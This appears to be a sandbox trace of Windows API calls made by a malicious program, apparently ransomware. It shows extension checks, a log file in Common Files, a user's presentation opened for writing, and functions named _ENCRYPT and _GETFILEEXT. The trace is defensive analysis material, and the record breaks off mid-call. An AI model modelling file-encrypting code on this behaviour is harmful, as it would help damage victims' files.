RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.190] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.191] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.191] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.193] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c5448 [0035.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.194] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0035.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0035.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0035.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0035.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.195] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.195] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.195] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.195] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.195] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.196] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.196] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x180d, lpOverlapped=0x0) returned 1 [0035.196] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.196] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x180d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.196] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.197] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.197] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.197] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.197] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.197] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.197] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.197] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.197] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.198] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889778 [0035.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889778, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.198] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\vp6fryq8wd7hsrbchzv.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.198] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.198] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.199] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.199] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.199] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0035.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cbb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.199] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.199] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.199] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.200] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.200] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.200] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.200] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 